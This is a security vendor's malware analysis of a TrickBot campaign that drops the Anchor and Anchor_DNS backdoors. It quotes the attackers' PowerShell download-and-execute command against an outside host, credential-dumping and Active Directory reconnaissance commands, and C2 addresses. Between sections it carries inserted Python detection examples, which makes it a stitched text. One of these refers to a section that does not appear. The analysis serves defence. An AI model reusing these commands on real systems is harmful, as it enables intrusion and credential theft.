# Dropping Anchor: From a TrickBot Infection to the Discovery of the Anchor Malware

**[cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware](https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware)**

Written By Cybereason Nocturnus, December 11, 2019 | 15 minute read

**Research By: Assaf Dahan, Lior Rochberger, Eli Salem, Mary Zhao, Niv Yona, Omer Yampel and Matt Hart**

## Introduction

Cybereason Nocturnus is monitoring a new wave of targeted campaigns against financial, manufacturing and retail businesses that began in early October. Similar to attacks [previously reported by Cybereason](https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware), this campaign started with a TrickBot infection and progressed into a hacking operation targeting sensitive financial systems. However, unlike previous operations that focused on causing a massive ransomware infection ([Ryuk](https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware) and [LockerGoga](https://www.fortinet.com/blog/threat-research/lockergoga-ransomeware-targeting-critical-infrastructure.html)) by compromising critical assets like the domain controller, this new operation is focused on targeting point of sale (PoS) systems. The campaign leverages a newly discovered malware family called Anchor exclusively for high-profile targets.

[Learn more about additional attacks that leverage TrickBot.](https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware)

This research focuses on the following aspects of the TrickBot-Anchor attack:

1. **Anatomy of the Attack:** A step-by-step anatomy of the attacks, including infection vectors and a dissection of the tools and techniques used by the attackers.
2. **New Malware:** The discovery of a new malware family called Anchor, which includes the [Anchor_DNS](https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns) variant and a new, undocumented Anchor that has been operating since August 2018 (and potentially even earlier). The Anchor malware is a backdoor used very selectively on high-profile targets, and appears to be tightly connected to TrickBot, potentially even authored by the same individuals who created TrickBot.

While this blog does not discuss attribution explicitly, the nature of these attacks, specifically the motivation and some of the tools and techniques detailed, has a certain resemblance to past attacks that were linked to the financially-motivated [FIN6 threat actor](https://attack.mitre.org/groups/G0037/), a group that is known to [target POS systems and has been linked to TrickBot infections in the past](https://www.zdnet.com/article/cybercrime-group-fin6-evolves-from-pos-malware-to-ransomware/).

Lastly, our blog emphasizes the gravity and danger that lies in commodity malware infections, as they have the potential of escalating to a hacking operation. This can easily lead to a disastrous outcome, whether it be a ransomware infection or theft of sensitive financial data.

## Key Points

- **The TrickBot-Anchor Operation:** Cybereason Nocturnus is investigating a series of targeted attacks against financial, manufacturing, and retail businesses across the United States and Europe.
- **Targets POS Systems:** The attacks target POS systems to steal sensitive information by taking over critical assets in the victims' network.
- **Deploys a Backdoor on High-value Targets:** On certain high-profile targets, the attackers selectively use a new variant of the rare [Anchor_DNS](https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns) tool. Anchor_DNS is a backdoor that uses the DNS protocol to stealthily communicate with C2 servers.
- **Uses a New, Undocumented Malware:** In addition to the new Anchor_DNS variant, the attackers use a completely new and previously undocumented malware dubbed Anchor. Anchor has been in operation since August 2018 and appears to be tightly related to TrickBot.
- **Adds Enhancements to TrickBot:** This attack adds a new and enhanced stealing module to TrickBot that focuses on stealing passwords from various products, including the [KeePass](https://keepass.info/) password manager.
- **Uses Known Tools for Reconnaissance and Lateral Movement:** The majority of the initial interactive hacking operation uses the known tools [Meterpreter](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter), [PowerShell Empire](https://github.com/EmpireProject/Empire), and [Cobalt Strike](https://www.cobaltstrike.com/) for reconnaissance and lateral movement.
- **Abuses the Trust of Certificate Authorities:** Many of the payloads in the attacks are signed binaries, which demonstrates the ever-growing trend of signed threats that abuse the trust of certificate authorities to bypass detection.

## Anatomy of the Attack: A Step-by-Step Analysis

_An overview of the attack tree, as seen in the Cybereason Defense Platform._

## Infection Vector

_Downloading and injecting TrickBot._

The attack starts with a phishing email that contains a malicious link to a file hosted on Google Docs named "Annual Bonus Report.doc". When the user clicks on the link, the TrickBot dropper downloads onto the target machine.
This differs from previous TrickBot attacks we have seen, [where TrickBot is usually dropped through a Microsoft Office document or by another malware like Emotet](https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware).

_Phishing email that tricks the user into downloading TrickBot._

### The TrickBot Downloader

The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. When the user double-clicks the file, they are presented with a decoy message box. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer.

_TrickBot displays a message box that suggests updating Microsoft Word or opening the file on another computer to preview the document._

While at first glance these files can be mistaken for legitimate Microsoft Word files, a closer inspection of the file metadata indicates they are not associated with Microsoft Word, nor are they Microsoft Word document files. Most of the initial payloads in these campaigns are signed with valid certificates to evade security tools. They abuse the relative trust that is given to signed binaries to avoid detection.

_File metadata properties for the fake Microsoft Word document._

_Signed malware is an evasive initial entry point into an organization._

The message box distracts the user while TrickBot's payload is downloaded, stored in the %TEMP% folder, and executed. A new process injects the TrickBot payload into a svchost.exe process.

_svchost.exe injected code malicious evidence as seen in the Cybereason Platform._

_Domain associated with the TrickBot payload download._

## The TrickBot Payload

Once TrickBot's main payload is injected into the svchost.exe process, it carries out a series of reconnaissance-related tasks to profile the infected endpoint and the network. This information is crucial, as it determines the course of the attack.
**Checking Network Connectivity**

TrickBot checks for Internet connectivity by trying to access several designated domains. These domains are preconfigured and belong to legitimate web services, including:

- checkip.amazonaws.com
- ipecho.net
- ipinfo.io
- api.ipify.org
- icanhazip.com
- myexternalip.com
- wtfismyip.com
- ip.anysrc.net

Once TrickBot verifies it can connect to the Internet, it communicates with C2 servers, some of which use TOR-related domains. It collects and sends information about where the target machine is located to the C2 servers.

**Browser History and Credential Theft**

After TrickBot establishes Internet access and sends information about the location of the target machine, it starts its malicious activity. The module [core-parser.dll](https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html) is reflectively loaded into svchost.exe. core-parser.dll parses the TrickBot config files and extracts IP addresses for secondary C2 communication, redirection, and web injection logic.

_core-parser.dll injected into svchost.exe._

TrickBot sends the reconnaissance information from the target machine to a hardcoded C2 server. The C2 server is responsible for handling the stolen data.

_A list of C2 servers extracted from TrickBot's configuration._

TrickBot also steals data from Internet Explorer by executing the built-in Windows tool [ESENTUTL](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875546(v%3Dws.11)) using the living-off-the-land binary (LOLBin) technique:

```
esentutl /p /o C:\Users\[USER]\AppData\Local\Temp\grabber_temp.edb
```

[This command dumps the Extensible Storage Engine (ESE) database format.](https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/)

**Application-specific Credential Theft**

This variant of TrickBot employs a new, unique ability to steal passwords from [KeePass](https://keepass.info/), a free, open-source password manager. TrickBot's KeePass stealing capabilities seem to be inspired by (or even partially copy-pasted from) a publicly available tool dubbed [PoshKPBrute](https://github.com/wevans311082/PoshKPBrute), a script that performs a dictionary attack against KeePass .kdbx files. Once it finds the dictionary key, it dumps all passwords as output and sends the attackers the master password.

_KeePass stealing brute force tool._

TrickBot's stealer module also tries to extract keys from [FileZilla](https://filezilla-project.org/), [OpenSSH](https://www.openssh.com/) and [OpenVPN](https://openvpn.net/).

_TrickBot attempting to steal keys from FileZilla, OpenSSH, and OpenVPN._

**Reconnaissance Commands**

In addition to several crafted PowerShell commands, the attackers use several legitimate Windows processes to gather information, including **nltest.exe, net.exe, ipconfig.exe, whoami.exe, and nslookup.exe**. They gather information on:

- All trusted domains, domains, and domain controllers
- A list of computers and network devices on the network
- The infected machine's user and the groups the user belongs to
- The infected machine, including machine name, operating system, workstation domain, and more
- Network adapters that have connected to the machine and DNS servers

_The net.exe process tree._

```
Nltest /domain_trusts /all_trusts
Net view /all
Nltest /domain_trusts
Net view /all /domain
Ipconfig /all
Net config workstation
Nslookup "-q=srv_kerberos._tcp" /c "start microsoft-edge:http://127.0.0.1:52715/11984"
```

_Reconnaissance commands launched by TrickBot._

The attacker also uses PowerShell to test DNS entry settings. They pass the argument `-q=srv_kerberos._tcp` to nslookup.exe to open an interactive shell. They use the shell to expand their search to other machines on the network by searching for things like a list of the domain controllers.
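Each of the discovery commands above is unremarkable on its own; what makes the activity detectable is the burst of distinct techniques on one host and the parent that spawns them. The following Python is an added example, not code from Cybereason or the report, that runs a sliding-window rule over constructed Sysmon-style process-creation events: it maps each command line to one of the discovery techniques the report lists (nltest, net, ipconfig, whoami, nslookup, plus the ADfind invocations described later in the Active Directory discovery section) and alerts when several distinct techniques run within a short window, noting when the parent is a process such as svchost.exe that should not be launching them. Host names, timestamps, the ten-minute window and the three-technique threshold are the author's choices for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events (timestamp, host, parent image, command line).
# These are made-up log lines shaped like Sysmon Event ID 1, not data from the report.
SAMPLE_EVENTS = [
    ("2019-10-03T10:01:05", "WS-017", "svchost.exe", "nltest /domain_trusts /all_trusts"),
    ("2019-10-03T10:01:06", "WS-017", "svchost.exe", "net view /all"),
    ("2019-10-03T10:01:07", "WS-017", "svchost.exe", "nltest /domain_trusts"),
    ("2019-10-03T10:01:08", "WS-017", "svchost.exe", "net view /all /domain"),
    ("2019-10-03T10:01:09", "WS-017", "svchost.exe", "ipconfig /all"),
    ("2019-10-03T10:01:10", "WS-017", "svchost.exe", "net config workstation"),
    ("2019-10-03T10:01:11", "WS-017", "svchost.exe", 'nslookup "-q=srv _kerberos._tcp"'),
    ("2019-10-03T10:01:12", "WS-017", "cmd.exe", 'adfind.exe -f "(objectcategory=computer)"'),
    # A help-desk user running two commands hours apart should not trip the rule.
    ("2019-10-03T11:30:00", "WS-042", "explorer.exe", "ipconfig /all"),
    ("2019-10-03T14:12:00", "WS-042", "cmd.exe", "net view /all"),
]

# One pattern per discovery technique; the arguments are the ones the report lists.
RECON_PATTERNS = {
    "domain_trusts":   re.compile(r"^nltest(\.exe)?\s+/domain_trusts", re.I),
    "network_hosts":   re.compile(r"^net(\.exe)?\s+view\b", re.I),
    "workstation_cfg": re.compile(r"^net(\.exe)?\s+config\s+workstation", re.I),
    "adapters_dns":    re.compile(r"^ipconfig(\.exe)?\s+/all", re.I),
    "user_context":    re.compile(r"^whoami(\.exe)?\b", re.I),
    "kerberos_srv":    re.compile(r"^nslookup(\.exe)?\s+.*-q=srv", re.I),
    "adfind_enum":     re.compile(r"^adfind(\.exe)?\s", re.I),
}

# Parents that should not normally be spawning discovery tools (TrickBot runs from svchost.exe).
UNUSUAL_PARENTS = {"svchost.exe", "rundll32.exe", "winword.exe", "excel.exe"}


def classify(command_line):
    """Return the discovery technique a command line implements, or None."""
    cmd = command_line.strip()
    for name, pattern in RECON_PATTERNS.items():
        if pattern.search(cmd):
            return name
    return None


def find_recon_bursts(events, window=timedelta(minutes=10), min_techniques=3):
    """Flag hosts on which at least `min_techniques` distinct discovery techniques ran
    inside one `window`. Returns {host: {"techniques": [...], "parents": [...], ...}}."""
    per_host = defaultdict(list)
    for ts, host, parent, cmd in events:
        technique = classify(cmd)
        if technique:
            per_host[host].append((datetime.fromisoformat(ts), technique, parent.lower()))

    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        for i, (start, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - start <= window]
            techniques = {t for _, t, _ in in_window}
            if len(techniques) >= min_techniques:
                parents = {p for _, _, p in in_window}
                alerts[host] = {
                    "techniques": sorted(techniques),
                    "parents": sorted(parents),
                    "unusual_parent": bool(parents & UNUSUAL_PARENTS),
                }
                break  # one alert per host is enough
    return alerts


if __name__ == "__main__":
    for host, info in find_recon_bursts(SAMPLE_EVENTS).items():
        print(host, info)
```

The rule keys on combinations rather than single commands because `ipconfig /all` or `net view` alone fire constantly in any enterprise; tuning the window and threshold against a week of baseline process telemetry is the usual way to set them.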
_TrickBot testing DNS settings._

With this in mind, we gather that the attackers' goal is to spread within organizations to multiple machines, not just to the target machine.

## From TrickBot Infection to Interactive Hacking

The threat actor evaluates information sent back to the C2 server and identifies if they have successfully infected a high-value target. If so, they escalate their efforts by switching to interactive hacking: reconnaissance, credential dumping, lateral movement, and in some cases the mass deployment of ransomware across endpoints connected to the domain controller.

### PowerShell Payloads

The threat actor leverages PowerShell to send additional payloads to the target machine. They issue commands to fetch a payload from a secondary server and, once it's downloaded, immediately execute it on the target machine through PowerShell:

```
powershell.exe -nop -windowStyle hidden -executionpolicy bypass -c "((new-object net.webclient).downloadstring('hxxps://northracing[.]net/?a=irs&x=[base64]'))"
```

The northracing[.]net URL contains a PowerShell script in the contents of the webpage. Though we were unable to fetch the script used in this specific incident, we were able to pivot off the query parameters used in the above PowerShell command (?a=irs&x=) to find a [sandbox report](https://any.run/report/daf223b923f335c3de66cae8a091063361262669c8f9acaf59a352b1e0e07b8c/b92f9889-00f9-429d-97e4-fb149cfe66db) for [similar activity](https://app.any.run/tasks/b92f9889-00f9-429d-97e4-fb149cfe66db/). The PowerShell payload runs in two stages: the first stage sends basic information to the C2 domain and waits for a response to see if it should continue its operation. If the threat actor does not send a stop flag, the PowerShell script runs in a constant loop and continuously POSTs data to the same domain the payload was fetched from. Each POST request is sent along with a UUID generated from the user's hostname and the current process ID.
_Information sent along each POST request in the payload._

A POST request containing basic information about the machine is sent, which includes the current user and their domain, the root of the file system, and information about the operating system.

_The PowerShell payload using WMI to probe for system information._

This information is sent to the C2 along with the `i` parameter. When a response is received, the payload checks to see if the response matches the value `cex01`. If it does, the PowerShell script stops executing and kills the task. If the response is any other value, the script sets a timeout variable based on the response and continues to the main loop. This indicates that the attacker is either looking to target specific Windows domains or specific operating system versions. The main loop sends a POST request to the server with the `t` parameter, which requests the next commands from the server.

_The main loop that sends a POST request to the server._

When the response from the threat actor contains a Base64-encoded command, it is decoded and then immediately executed using PowerShell through the Invoke-Expression (IEX) cmdlet. The output of the command is sent back to the C2 server using a POST request with the `a` parameter.

### Meterpreter & Cobalt Strike Implants

_The attack tree demonstrating the beginning of the hacking operation using Meterpreter._

**Meterpreter Implant**

The attackers use a [Meterpreter](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter) implant to carry out post-exploitation actions. The Cybereason Platform detects both the shellcode and various Meterpreter DLLs reflectively loaded into memory. The detected DLLs include:

- **metsrv.dll:** For Meterpreter, where the protocol and extension systems are implemented
- **ext_server_priv.x86.dll:** For privilege escalation
- **ext_server_stdapi.x86.dll:** A Metasploit post-exploitation module used for reconnaissance

Cybereason detects the reflectively loaded malicious modules as a Meterpreter agent and shellcode executed by the Meterpreter agent.

_Examining the loaded modules shows which Metasploit modules are loaded._

The Meterpreter agent creates a connection to port 4444 on the external IP address 91.12.89[.]129.

**Cobalt Strike Implant**

Using Meterpreter, the attackers injected [Cobalt Strike](https://www.cobaltstrike.com/) and other Metasploit payloads into the rundll32.exe process.

_Attackers injecting Cobalt Strike and other Metasploit payloads into the rundll32.exe process._

_Detection of Cobalt Strike, Meterpreter, and shellcode execution._

The attacker uses the following [Metasploit modules](https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/):

- **ext_server_extapi.x86.dll:** Obtains clipboard data and manipulates and decrypts the NTDS file
- **ext_server_priv.x86.dll:** Performs privilege escalation
- **ext_server_stdapi.x86.dll:** Performs reconnaissance activity
- **bypassuac.x64.dll:** A post-exploitation module used to bypass User Account Control

_Post-exploitation modules reflectively loaded into rundll32.exe._

_The connection to the external IP address 199.217.115[.]53 on port 8443._

Both Meterpreter and Cobalt Strike are legitimate penetration testing tools that have been repeatedly used by various threat actors, including [the FIN6 threat actor](https://attack.mitre.org/groups/G0037/).

**Active Directory Discovery using Cobalt Strike**

The threat actor uses known Cobalt Strike modules to enumerate Active Directory information:

- [https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/Invoke-DACheck.ps1](https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/Invoke-DACheck.ps1)
- [https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/Initial-LAdminCheck.cna](https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/Initial-LAdminCheck.cna)

The attackers execute several Base64-encoded PowerShell commands in order to determine if the infected machine's user is in the admin or domain admin group. After verifying the user is an admin, the threat actor gathers information about the domain controllers and their IP addresses using an additional Base64-encoded and compressed PowerShell command.

_The obfuscated and compressed PowerShell command._

_The decoded PowerShell command that attempts to gather domain controller information._

**Active Directory Discovery using ADfind**

The attackers deploy a batch script that executes the [ADfind.exe](http://www.joeware.net/freetools/tools/adfind/) tool to enumerate users, groups, and computers of the Windows domain:

```
adfind.exe -f "(objectcategory=organizationalUnit)"
adfind.exe -gcb -sc trustdmp
adfind.exe -f "objectcategory=computer"
adfind.exe -sc trustdmp
adfind.exe -f "(objectcategory=person)"
adfind.exe -subnets -f (objectCategory=subnet)
adfind.exe -f "(objectcategory=group)"
```

[The ADfind tool has reportedly been used previously in attacks related to FIN6.](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html)

## New Anchor_DNS Variant Discovered

One of the most interesting payloads in these attacks is the Anchor_DNS malware, which was originally discovered in October 2019 by NTT Security. It is classified by NTT as a variant of the infamous TrickBot malware, and it uses DNS tunneling to stealthily communicate with C2 servers.
Though this variant was first discovered in October 2019, there is evidence that Anchor_DNS was used as far back as March 2019.

_Oldest Anchor_DNS sample observed, SHA-1: b388243bf5899c99091ac2df13339f141659bbd4_

This new variant acts as a sophisticated, stealthy backdoor that selectively chooses high-profile targets. Anchor_DNS is still undergoing rapid development cycles with code changes and new feature updates every few weeks. This is a new variant of Anchor_DNS that appeared as early as November 2019 and exhibits the following changes in code and behavior:

- No self-deletion mechanism, which was present in previous samples
- No Internet connectivity checks using legitimate online web services
- A built-in capability to check for C2 availability using ICMP (ping)
- Additional partial string encryption and code obfuscation

### Static Analysis Observations

| File name | SHA-1 |
| --- | --- |
| anchorDNS_x64.exe | 5f1ad1787106de9725005d8da33d815d0994ee83 |

anchorDNS_x64.exe contains a PDB path with the name of the malware, Anchor_DNS. This file is the 64-bit version of Anchor_DNS; however, there were earlier instances of the 32-bit version as well. The project name shows that this is the fifth version of Anchor_DNS.

```
PDB PATH: C:\simsim\anchorDNS.v5\Bin\x64\Release\anchorDNS_x64.pdb
```

Many strings in the code have typos and grammatical mistakes, further affirming our suspicion that the authors of Anchor_DNS are not native English speakers.

_Multiple typos and grammatical mistakes in the Anchor_DNS code._

The threat actor put considerable effort into obfuscating the code of this new Anchor_DNS variant using stack strings, string encryption, and by implementing a packer. The following example shows considerable changes in the code of the WinMain() function between an older variant of Anchor_DNS and the new variant.

Anchor_DNS was able to stay under the radar by using specific execution flags. If these command-line arguments are not supplied, Anchor_DNS terminates.

- **-i flag:** creates a scheduled task with the following naming convention (e.g. "Notepad++ autoupdate#94654"): `[random folder name in %APPDATA%] autoupdate#[random_number]`. Writes [NTFS ADS files](https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/) ($TASK, $GUID, $FILE):

| Alternate Data Stream | ADS Contents | Decoded Contents |
| --- | --- | --- |
| edskype.exe:$FILE | QzpcVXNlcnNcdXNlclxBcHBEYXRhXFJvYW1pbmdcU2t5cGVcZWRza3lwZS5leGU= | C:\Users\user\AppData\Roaming\S |
| edskype.exe:$TASK | Tm90ZXBhZCsrIGF1dG91cGRhdGUjOTQ2NTQ | Notepad++ autoupdate#94654 |
| edskype.exe:$GUID | [BASE64] | /anchor_dns/[COMPUTER_NAME] [clientID]/ |

- **-u flag:**
  - New variant: executes the malware's main communication module with the C2
  - Old variant: drops a copy in %TEMP% and creates ADS files ($GUID, $FILE)
- **-s flag:** appears only on older versions of Anchor_DNS and runs the program without creating persistence; it self-deletes once done.
- **--log=:** expects a file name to write a log file in C:\Users\[USER]

_Contents of the debug file created by Anchor_DNS._

**C2 Communication**

Older and newer versions of Anchor_DNS communicate over DNS. However, the newer version described here does not check Internet connectivity using legitimate online web services like ipinfo.io, and instead uses a built-in capability to check for the server's availability using the ICMP protocol.

_Determining C2 server connectivity._

**DNS Tunneling**

Anchor_DNS communicates with the C2 servers over DNS using [DNS tunneling](https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152). With this technique, Anchor_DNS can transfer data, receive commands, and download an additional payload, as detailed in [NTT Security's report on an older Anchor_DNS sample](https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns). By implementing DNS tunneling, Anchor_DNS can evade certain security products that might block certain network protocols or overlook DNS traffic.

_Example of DNS tunneling traffic generated by Anchor_DNS._

## Discovery of the Anchor Malware and Its Connection to TrickBot

During our investigation, we found several unidentified malware samples related to TrickBot infections. The malware is dubbed Anchor by its authors and has been active since August 2018. Unlike Anchor_DNS, the Anchor malware does not implement communication over DNS. However, it does share many behavioral, code, and string similarities with Anchor_DNS and some similarities to TrickBot.

_Earliest Anchor sample observed (SHA-1: 3ed09498214d93c9ec14a15286546d242ad58943)_

_PDB path for the earliest Anchor sample found._

Many Anchor samples have a very low or at times zero detection rate by AV vendors, which could explain the limited reports about this malware.

_List of Anchor payloads found on VirusTotal with 0/0 detection rate._

The malware has both x86 and x64 versions and contains an installer component to install the malware.
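The DNS tunneling described in the Anchor_DNS section above is usually caught on the network side, where the tunnel distorts three things a resolver log exposes: the number of distinct subdomains queried under one registered domain, their length, and the entropy of their labels. The following Python is an added example, not code from the report or from Cybereason, that scores a constructed resolver log on those three features. The log lines, the domain c2-example.test, the hex-looking labels and the thresholds are all the author's inventions, and the code assumes the registered domain is the last two labels of a name (a production version would consult the public suffix list).

```python
import math
from collections import defaultdict

# Constructed resolver log (timestamp, client, query name, type); not traffic from the report.
# example.com plays a benign domain, c2-example.test a tunnel carrying data in its labels.
SAMPLE_DNS_LOG = """\
2019-11-21T09:00:01 10.0.0.15 www.example.com A
2019-11-21T09:00:02 10.0.0.15 mail.example.com A
2019-11-21T09:00:03 10.0.0.15 cdn.example.com A
2019-11-21T09:00:04 10.0.0.15 www.example.com A
2019-11-21T09:00:05 10.0.0.15 static.example.com A
2019-11-21T09:00:10 10.0.0.15 3f9a1c7e5b2d8046a1c3e5f7092b4d6e.c2-example.test A
2019-11-21T09:00:11 10.0.0.15 8e2c4a6f0b1d3579c8a6e4f2d0b97531.4a1b.c2-example.test TXT
2019-11-21T09:00:12 10.0.0.15 a7c3e9f1b5d7042681a3c5e7f9b1d3f5.c2-example.test A
2019-11-21T09:00:13 10.0.0.15 0b2d4f6a8c1e3957b0d2f4a6c8e1a3c5.4a1c.c2-example.test TXT
2019-11-21T09:00:14 10.0.0.15 5e7a9c1f3b6d8024e6a8c0f2b4d6a8e0.c2-example.test A
2019-11-21T09:00:15 10.0.0.15 c1e3a5f7b9d2046813c5e7a9f1b3d5f7.c2-example.test A
"""


def shannon_entropy(text):
    """Bits of entropy per character; hex or Base64 payloads score near 4 or 6, words near 2-3."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Split into (subdomain part, registered domain). Assumes the registered domain is the
    last two labels; a real deployment would use the public suffix list instead."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def profile_domains(log_text):
    """Aggregate, per registered domain, the features a tunnel distorts."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "qtypes": set(),
                                 "lengths": [], "entropies": []})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, _client, qname, qtype = line.split()
        sub, domain = split_name(qname)
        s = stats[domain]
        s["queries"] += 1
        s["qtypes"].add(qtype)
        if sub:
            s["subdomains"].add(sub)
            s["lengths"].append(len(sub))
            s["entropies"].append(shannon_entropy(sub.replace(".", "")))
    return stats


def score_domain(s, min_unique=5, min_avg_len=20, min_entropy=3.0):
    """Return the tunnelling signals a domain triggers; an empty list means benign."""
    if not s["subdomains"]:
        return []
    unique = len(s["subdomains"])
    avg_len = sum(s["lengths"]) / len(s["lengths"])
    avg_ent = sum(s["entropies"]) / len(s["entropies"])
    reasons = []
    if unique >= min_unique and unique / s["queries"] > 0.8:
        reasons.append(f"{unique} unique subdomains in {s['queries']} queries")
    if avg_len >= min_avg_len:
        reasons.append(f"average subdomain length {avg_len:.0f}")
    if avg_ent >= min_entropy:
        reasons.append(f"average label entropy {avg_ent:.2f} bits")
    # Require all three signals: any one alone is noisy (CDNs, telemetry, anti-spam lookups).
    return reasons if len(reasons) == 3 else []


def find_tunnels(log_text):
    flagged = {}
    for domain, s in profile_domains(log_text).items():
        reasons = score_domain(s)
        if reasons:
            flagged[domain] = reasons
    return flagged


if __name__ == "__main__":
    for domain, reasons in find_tunnels(SAMPLE_DNS_LOG).items():
        print(domain, reasons)
```

Because the rule aggregates per domain rather than per query, it does not depend on any particular encoding Anchor_DNS uses, which is the property you want against a family the report says is changing every few weeks.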
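The named streams in the Anchor_DNS ADS table above, and the cleartext $GUID that Anchor writes (described in the next section), are the kind of artifact a responder collects from a host and needs to decode quickly. The following Python is an added example, not code from the report or from Cybereason: given a dump of stream names and raw contents, it repairs missing Base64 padding, falls back to cleartext when the bytes are not Base64, flags the three stream names both families use, and parses the `[Machine_NAME]_[Windows_Version].[Client_ID]` pattern described in the GUID Generation Function section below. The two Base64 values are the ones printed in the table; the $GUID values are built from the report's example GUIDs; the DLL file name is a placeholder, and the layout of the Windows version token (major, minor, build) is the author's assumption.

```python
import base64
import re

# Constructed stream dump (stream name -> raw bytes), as a responder would collect it with
# `dir /r` plus a read of each named stream. The DLL name is a placeholder, not from the report.
SAMPLE_STREAMS = {
    "edskype.exe:$FILE": b"QzpcVXNlcnNcdXNlclxBcHBEYXRhXFJvYW1pbmdcU2t5cGVcZWRza3lwZS5leGU=",
    "edskype.exe:$TASK": b"Tm90ZXBhZCsrIGF1dG91cGRhdGUjOTQ2NTQ",   # padding stripped, as in the table
    "edskype.exe:$GUID": base64.b64encode(b"/anchor_dns/MACHINE-001_W617601.D4CB942AA18EFF519DCBCAE88A0A99FB/"),
    "placeholder_anchor.dll:$GUID": b"/anchor001/jujubox-PC_W617601.6E8516CA48318FB2904E2027B5350B26",  # Anchor: cleartext
}

ANCHOR_STREAMS = {"$FILE", "$TASK", "$GUID"}
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# /<tag>/[Machine_NAME]_[Windows_Version].[Client_ID]/ as shown in the report's GUID table.
GUID_RE = re.compile(r"^/(?P<tag>[^/]+)/(?P<machine>.+)_(?P<winver>W\d+)\.(?P<client>[0-9A-Fa-f]{32})/?$")


def decode_stream(raw):
    """Return (encoding, text): 'base64' if the bytes decode to printable text, else 'cleartext'."""
    text = raw.decode("utf-8", "replace").strip()
    if B64_RE.match(text):
        try:
            decoded = base64.b64decode(text + "=" * (-len(text) % 4)).decode("utf-8")
            if decoded.isprintable():
                return "base64", decoded
        except (ValueError, UnicodeDecodeError):
            pass
    return "cleartext", text


def windows_version(token):
    """W617601 -> 6.1.7601, W10017134 -> 10.0.17134 (assumed layout: major, minor, build)."""
    digits = token[1:]
    major = "10" if digits.startswith("10") else digits[0]
    rest = digits[len(major):]
    return f"{major}.{rest[0]}.{rest[1:]}"


def parse_guid(text):
    m = GUID_RE.match(text.strip())
    if not m:
        return None
    return {"tag": m["tag"], "machine": m["machine"],
            "windows": windows_version(m["winver"]), "client_id": m["client"].upper()}


def triage_streams(streams):
    """Decode every named stream and flag the ones Anchor and Anchor_DNS are known to write."""
    report = {}
    for name, raw in streams.items():
        _host_file, _, stream = name.partition(":")
        encoding, text = decode_stream(raw)
        entry = {"encoding": encoding, "decoded": text, "suspicious": stream in ANCHOR_STREAMS}
        if stream == "$GUID":
            entry["guid"] = parse_guid(text)
        report[name] = entry
    return report


if __name__ == "__main__":
    for name, entry in triage_streams(SAMPLE_STREAMS).items():
        print(name, entry)
```

The machine name and client ID recovered from a $GUID are what let you pivot across hosts: the same client ID appearing in DNS queries or HTTP paths elsewhere ties that traffic back to the infected machine.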
| Payload Name | SHA-1 | PDB Path |
| --- | --- | --- |
| anchorInstaller_x86 | 3ed09498214d93c9ec14a15286546d242ad58943<br>4bba60ff11f8b150b004960c658ad74a707ebcea | D:\MyProjects\secondWork\Anchor\Win32\Release\anchorInstaller_x86<br>C:\Users\ProFi\Desktop\data\Win32\anchorInstaller_x86Code\anchorIn |
| anchorInstaller_x64 | e75983b073ff0632e35e237f6622466c2699687c | |
| Anchor_x86 | bd26238fb7d7e16ea79073d882bba00d34dd859c<br>f3683a0c12154e8bf44d9d942db3eac9e930e7a5<br>9ebb541dcb24d564448a6f5e00c613b73eba7148 | D:\MyProjects\secondWork\Anchor\Win32\Release\Anchor_x86.pdb<br>C:\Users\ProFi\Desktop\data\Win32\anchorInstaller_x86Code\Anchor_<br>D:\Anchor\Anchor\Win32\Release\Anchor_x86.pdb |
| Anchor_x64 | 46c595e580719a4c54f55b4041f81d6e50ab4062<br>e5dc7c8bfa285b61dda1618f0ade9c256be75d1a | D:\Anchor\x64\Debug\Anchor_x64.pdb<br>C:\[JOB]\Anchor\x64\Release\Anchor_x64.pdb |

The Anchor payload is delivered by AnchorInstaller.

_AnchorInstaller unpacks the Anchor DLL and drops it in the %SYSTEMROOT% or %SYSTEMROOT%\System32 folder._

The dropped DLL is loaded by the service netTcpSvc, which is created by the malware.

_Anchor service persistence found in the registry._

### NTFS ADS File - Storing the GUID

Similar to Anchor_DNS, Anchor creates an NTFS ADS file $GUID to store its GUID:

_Anchor GUID stored as an NTFS ADS._

